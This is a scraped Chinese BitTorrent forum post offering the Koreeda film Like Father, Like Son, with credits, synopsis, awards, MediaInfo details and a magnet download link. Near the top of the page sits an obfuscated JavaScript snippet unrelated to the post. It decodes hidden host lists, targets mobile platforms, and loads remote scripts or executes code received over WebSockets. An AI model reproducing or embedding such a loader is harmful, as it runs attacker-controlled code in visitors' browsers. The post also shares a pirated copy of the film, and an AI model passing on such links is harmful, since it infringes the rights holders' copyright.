如父如子[中文字幕].Like.Father.Like.Son.2013.1080p.FriDay.WEB-DL.H264.AAC 3.38GB

版主小s 1月前 680

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 如父如子 / 谁调换了我的父亲(港) / 我的意外爸爸(台) / 有其父必有其子 / 然后变成爸爸 / Like Father, Like Son / Tel Père, Tel Fils / Soshite Chichi Ni Naru
◎片  名 そして父になる
◎年  代 2013
◎产  地 日本
◎类  别 剧情 / 家庭
◎语  言 日语
◎上映日期 2013-09-28(日本)
◎IMDb链接 https://www.imdb.com/title/tt2331143/
◎豆瓣评分 8.7/10 (128802人评价)
◎豆瓣链接 https://movie.douban.com/subject/10571509/
◎片  长 120分钟
◎导  演 是枝裕和 Hirokazu Koreeda (id:1274351)
◎编  剧 是枝裕和 Hirokazu Koreeda (id:1274351)
◎演  员 福山雅治 Masaharu Fukuyama (id:1006103)
       尾野真千子 Machiko Ono (id:1042642)
       真木阳子 Yoko Maki (id:1028094)
       中川雅也 Lily Franky (id:1042693)
       风吹淳 Jun Fubuki (id:1048583)
       国村隼 Jun Kunimura (id:1041791)
       树木希林 Kirin Kiki (id:1014853)
       夏八木勋 Isao Natsuyagi (id:1016970)
       井浦新 ARATA (id:1050495)
       二宫庆多 Keita Ninomiya (id:1333180)
       黄升炫 Shogen Hwang (id:1340186)
       足立智充 Tomomitsu Adachi (id:1324028)
       中村友理 Yuri Nakamura (id:1274749)
       泷正则 Pierre Taki (id:1002495)
       清水一彰 Kazuaki Shimizu (id:1436028)
       田中哲司 Tetsushi Tanaka (id:1313629)
       松本淳一 Junichi Matsumoto (id:1338550)
       松原毅 Takeshi Matsubara (id:1338551)
       森敬 Takashi Mori (id:1338552)
       泷本干也 Mikiya Takimoto (id:1338553)
       是枝裕和 Hirokazu Koreeda (id:1274351)
       兼重淳 Atsushi Kaneshige (id:1362153)

◎标  签 是枝裕和 / 日本 / 亲情 / 家庭 / 日本电影 / 福山雅治 / 剧情 / 温情

◎简  介
  普通上班族野野宫良多(福山雅治 饰)和妻子野野宫绿(尾野真千子 饰)结婚多年,感情十分要好,两人共同养育着聪明乖巧的儿子野野宫庆多(二宫庆多 饰),生活宁静中处处透露着幸福。令本以为平静生活将一直持续的三人没有想到的是,一通来自庆多出生的医院的电话将这个小家庭卷入了风口 浪尖之上。                                    
                                原来,庆多并非良多和绿的儿子,而是由斋木雄大(利利·弗兰克 饰)和尤加利(真木阳子 饰)的爱情结晶。是朝夕相处的感情珍贵,还是血脉相连的羁绊重要?面对多年前一个小小误会所酿成的后果,良多和绿不知该何去何从。而对于雄大、尤加利和两人亦非亲生的孩子斋木琉晴(黄升炫 饰)来说,他们亦站在了人生的十字路口之前。

◎获奖情况 (共22项)
  第66届戛纳电影节 (2013)
  主竞赛单元 金棕榈奖(提名)
   └──是枝裕和 (id:1274351)
  主竞赛单元 评审团奖
  天主教人道精神奖-特别提及
   └──是枝裕和 (id:1274351)

  第37届日本电影学院奖 (2014)
  最佳影片(提名)
  最佳导演(提名)
   └──是枝裕和 (id:1274351)
  最佳编剧(提名)
   └──是枝裕和 (id:1274351)
  最佳男主角(提名)
   └──福山雅治 (id:1006103)
  最佳女主角(提名)
   └──尾野真千子 (id:1042642)
  最佳男配角
   └──中川雅也 (id:1042693)
  最佳女配角
   └──真木阳子 (id:1028094)
  最佳配乐(提名)
  最佳摄影(提名)
   └──泷本干也 (id:1338553)
  最佳照明(提名)
   └──藤井稔恭 (id:1338555)
  最佳录音(提名)
   └──弦巻裕 (id:1299586)
  最佳剪辑(提名)
   └──是枝裕和 (id:1274351)

  第8届亚洲电影大奖 (2014)
  最佳导演(提名)
   └──是枝裕和 (id:1274351)
  最佳男主角(提名)
   └──福山雅治 (id:1006103)
  最佳新演员(提名)
   └──二宫庆多 (id:1333180)

  第57届伦敦电影节 (2013)
  最佳影片(提名)
   └──是枝裕和 (id:1274351)

  第17届美国在线影评人协会奖 (2013)
  最佳非北美上映影片

  第1届豆瓣电影年度榜单 (2014)
  评分最高的日本电影(提名)

  第5届豆瓣电影鑫像奖 (2015)
  鑫豆单元 最佳日本电影

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 46456330232103080489547965745808877731 (0x22F329EB85B4C3B380C22866230928A3)

  4. Complete name                            : [email protected]DDQ.COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 3.38 GiB

  8. Duration                                 : 2 h 0 min

  9. Overall bit rate                         : 4 002 kb/s

  10. Encoded date                             : UTC 2021-09-03 04:34:28

  11. Writing application                      : mkvmerge v56.1.0 ('My Friend') 64-bit

  12. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID                                       : 1

  15. Format                                   : AVC

  16. Format/Info                              : Advanced Video Codec

  17. Format profile                           : [email protected]

  18. Format settings                          : CABAC / 1 Ref Frames

  19. Format settings, CABAC                   : Yes

  20. Format settings, Reference frames        : 1 frame

  21. Format settings, GOP                     : M=1, N=60

  22. Codec ID                                 : V_MPEG4/ISO/AVC

  23. Duration                                 : 2 h 0 min

  24. Bit rate mode                            : Constant

  25. Bit rate                                 : 4 000 kb/s

  26. Width                                    : 1 920 pixels

  27. Height                                   : 1 080 pixels

  28. Display aspect ratio                     : 16:9

  29. Frame rate mode                          : Constant

  30. Frame rate                               : 29.970 (30000/1001/53354) FPS

  31. Color space                              : YUV

  32. Chroma subsampling                       : 4:2:0

  33. Bit depth                                : 8 bits

  34. Scan type                                : Progressive

  35. Bits/(Pixel*Frame)                       : 0.064

  36. Stream size                              : 3.27 GiB (97%)

  37. Language                                 : English

  38. Default                                  : Yes

  39. Forced                                   : No


  40. Audio

  41. ID                                       : 2

  42. Format                                   : AAC LC

  43. Format/Info                              : Advanced Audio Codec Low Complexity

  44. Codec ID                                 : A_AAC-2

  45. Duration                                 : 2 h 0 min

  46. Bit rate                                 : 125 kb/s

  47. Channel(s)                               : 2 channels

  48. Channel layout                           : L R

  49. Sampling rate                            : 48.0 kHz

  50. Frame rate                               : 46.875 FPS (1024 SPF)

  51. Compression mode                         : Lossy

  52. Stream size                              : 108 MiB (3%)

  53. Title                                    : Japanese

  54. Language                                 : Japanese

  55. Default                                  : Yes

  56. Forced                                   : No


  57. Text #1

  58. ID                                       : 3

  59. Format                                   : UTF-8

  60. Codec ID                                 : S_TEXT/UTF8

  61. Codec ID/Info                            : UTF-8 Plain Text

  62. Duration                                 : 1 h 56 min

  63. Bit rate                                 : 30 b/s

  64. Count of elements                        : 1281

  65. Stream size                              : 26.3 KiB (0%)

  66. Title                                    : Chinese Simplified

  67. Language                                 : Chinese

  68. Default                                  : Yes

  69. Forced                                   : No


  70. Text #2

  71. ID                                       : 4

  72. Format                                   : UTF-8

  73. Codec ID                                 : S_TEXT/UTF8

  74. Codec ID/Info                            : UTF-8 Plain Text

  75. Duration                                 : 1 h 56 min

  76. Bit rate                                 : 30 b/s

  77. Count of elements                        : 1281

  78. Stream size                              : 26.3 KiB (0%)

  79. Title                                    : Chinese Traditional

  80. Language                                 : Chinese

  81. Default                                  : No

  82. Forced                                   : No



TAGS 剧情 家庭

磁力链:
  • magnet:?xt=urn:btih:EB19C0CC72B907BB91CC797CE7454DF104CC227D
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回